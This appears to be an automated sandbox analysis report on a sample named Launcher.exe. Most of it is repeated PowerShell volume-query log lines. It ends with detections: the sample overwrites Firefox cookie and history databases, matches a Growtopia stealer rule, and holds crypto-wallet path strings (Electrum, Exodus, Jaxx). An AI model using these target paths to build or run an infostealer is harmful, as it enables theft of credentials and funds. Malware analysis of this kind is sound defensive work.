        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Overwrites Mozilla Firefox settings
        Source: C:\Users\user\Desktop\Launcher.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\cookies.sqlite_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmpJump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\places.sqlite_tmpJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Growtopia
        Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 5496, type: MEMORYSTR
        Found many strings related to Crypto-Wallets (likely being stolen)
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectronCash
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty Wallet
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\window-state.json
        Source: Launcher.exe, 00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.conf.json
